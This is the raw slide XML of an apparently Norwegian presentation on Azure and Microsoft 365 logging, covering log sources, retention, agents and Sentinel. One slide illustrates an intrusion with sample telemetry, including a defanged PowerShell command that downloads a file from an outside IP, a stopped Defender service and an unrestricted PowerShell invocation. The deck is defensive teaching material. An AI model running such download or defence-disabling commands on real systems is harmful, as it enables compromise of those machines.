                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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User Activity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Microsoft 365 Security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90 Days (1 year for E5)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050608"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Admin Activity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Microsoft 365 Security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90 Days (1 year for E5)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637081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Mailbox Audit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b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Exchange Online</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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90 Days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76732"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b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Sign-In Activity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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b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Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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30 Days (AAD P1)</a:t>
                      </a:r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387040"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Users at Risk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b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Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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  <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b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7 Days (30 Days, P1/P2)</a:t>
                      </a:r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  <a:p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551764"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Risky Sign-ins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b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Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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  <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b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7 Days (30 Days, P1/P2)</a:t>
                      </a:r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  <a:p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579214"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Azure MFA Usage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b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Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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  <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b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30 Days 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71757"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="517213">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Directory Audit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b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Azure AD</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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  <a:p>
                      <a:endParaRPr lang="en-US" sz="1400" b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7 Days (30 Days, P1/P2)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245"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="490674">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b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Intune Activity Log</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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Intune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1 Year (Graph API)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59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422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b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs and log sources</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO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D4010B07-1478-4273-8289-A68C5CF80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486685"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="932802" y="1566401"/>
          <a:ext cx="10077820" cy="4233145"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3680454339"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="897638882"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="898253443"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2519455">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403709729"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Audit Log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1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Category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1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Enabled as standard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b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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Retention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81576"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Azure Resource Manager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Azure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Yes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30 Days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050608"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO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Network Security Group Flow Logs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Azure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Depending on Configuration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637081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3975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Azure Diagnostic Logs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Azure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Depending on Configuration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983490"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101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Azure Application Insight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Azure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Depending on Configuration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718910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101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VM Event Logs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OS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Yes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Size defined in Group Policy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463595"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101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Custom Logs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OS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N/A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Application specific logs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16217"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437101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Azure Security Center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Azure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No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 (Cost per host/PaaS)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Depending on Log Analytics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20389"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="402439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SaaS Usage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N/A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Requires Cloud App Discovery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81102"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="315238">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b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Custom Sources**</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b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b="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N/A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No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>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Depending on Configuration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Segoe UI Semibold" panose="020B0702040204020203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089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23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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Logging and Monitorering in Azure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F76991-6E96-47A9-A5BD-B8E1B76DF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974" y="1918399"/>
            <a:ext cx="7143482" cy="3234012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0FBE5F0-4E7E-466C-AEBD-FC9FC35C61AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742340"/>
            <a:ext cx="3751771" cy="548701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5475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4888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5213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r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Monitoring Agent (MMA) vs Log Analytics Agent (Legacy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MMA with Data Collection Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dependency Agent provides insight into processes and network connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Log files in Preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="20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https://bit.ly/3vclP4d</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sysmon with extra config to collect even more audit data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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SwiftOnSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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 err="1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sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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-config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-N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64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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How to see the full picture?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32D8B-C9FF-4CD1-BE20-C143D2218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94" y="1367091"/>
            <a:ext cx="1000125" cy="9239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D81E5-C07F-4887-B35A-9FF2FB3697A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465787" y="2757153"/>
            <a:ext cx="1856703" cy="940603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nb-NO" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VM Connection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(VM Insight)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1822D0-7E98-4CC5-8A3F-2012CFC94157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183755" y="2761447"/>
            <a:ext cx="1902139" cy="940603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200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeviceFileEvents</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Defender for Cloud)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EB63F4-8557-4DE9-A5A6-508165733650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7654348" y="2778618"/>
            <a:ext cx="1856703" cy="940603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200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Azure Automation)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C0BA8C-E113-4BF3-A525-460C7FC64471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790426" y="2770032"/>
            <a:ext cx="1856703" cy="940603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200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Events (Microsoft Sentinel via Log Analytics)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72A64-A62E-4287-9DF0-2497EF5DBD8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857742" y="2263434"/>
            <a:ext cx="4814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dirty="0"/>
              <a:t>Windows VM i Azure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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1FA410-64D2-43D1-833E-F5FF2D55B8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925322" y="2776472"/>
            <a:ext cx="1856703" cy="940603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200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeviceProcess</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nb-NO" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Events (Defender for Cloud)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3EBB65-08FC-4C90-A2D8-963DFE093710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762505" y="3717705"/>
            <a:ext cx="16146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8.8.8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Inbound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>3389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>svchost</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Russia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935B7-3F85-4468-A853-281A246F52A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2959743" y="3725881"/>
            <a:ext cx="60949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8.8.8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>4624 - An account </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>was successfully </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>logged 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C87F45-E72D-49A8-975B-52F25ECA7104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5204327" y="3713557"/>
            <a:ext cx="21362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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH –file *.zip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185074-7C68-43B5-86C7-1FA2CAA27015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7964420" y="3737030"/>
            <a:ext cx="21362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 dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ervice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Stopped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>MpSense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4092E0-5B71-4DAE-9B27-F97E7F272A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10100167" y="3736273"/>
            <a:ext cx="21362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powershell.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ExecutionPolicy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Unrestricted</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Neininteractive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543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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Log Analytics and Sentinel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E8665-352C-48C2-9FCF-BD805AB6E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245" y="1104825"/>
            <a:ext cx="3937265" cy="5046494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2A030A9-6D6A-47D6-94B4-D748689B591C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742339"/>
            <a:ext cx="4102437" cy="53557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5475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4888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5213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r>
              <a:rPr lang="nb-NO" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log Analytics –  Extra Solutions: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DNS Insight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Antimalware assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basic and Analytics Logs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(In preview)</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sentinel with connectors to collect security events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Either Sentinel or Defender for Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Defender support is in Preview </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(for data collection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO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endParaRPr lang="nb-N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5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0677-A7E3-4972-F453-226DE3EE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454" y="750432"/>
            <a:ext cx="10772775" cy="50515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am I?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00BFA5D-0332-4BF1-AF52-4199F1362D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26" y="5395555"/>
            <a:ext cx="336804" cy="336804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B010374-2DF6-427B-BEAE-A5491B1D71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26" y="4930753"/>
            <a:ext cx="336804" cy="336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2982DE-B6BE-4112-9BFF-ABD70AE6410A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626469" y="491448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@msandbu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2D9C0E-1ACE-4174-A91F-76EA75C7F9BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626469" y="5363027"/>
            <a:ext cx="254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Linkedin.com/msandbu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87ED5B-4A43-4B3B-8F7D-14B2CD230431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177417" y="4108014"/>
            <a:ext cx="3811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Marius Sandbu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-N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 Evangelist @ Sopra Steria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B3861DA-AE8C-4576-8B37-3E2165DFB4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26" y="5844093"/>
            <a:ext cx="336804" cy="3368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068AA8-E6D8-4C1E-AC13-DF6D250261DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636030" y="5813199"/>
            <a:ext cx="15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msandbu.org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 descr="A picture containing person, outdoor, mammal, petting&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD45CBF7-0B08-4738-87B6-6B4919F974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80" y="1457197"/>
            <a:ext cx="4463676" cy="25155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Trusselsky logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFC2086-32F1-4A7A-80D7-72F8C23AC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575" y="426205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oudFirst Podcast logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620BDB6A-8D95-4300-B604-344596DA9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230" y="4076701"/>
            <a:ext cx="2200532" cy="220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710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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Example Query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2A030A9-6D6A-47D6-94B4-D748689B591C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742340"/>
            <a:ext cx="4102437" cy="4074456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5475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4888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5213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10453-1EED-4013-AF40-658F8EE4DC08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
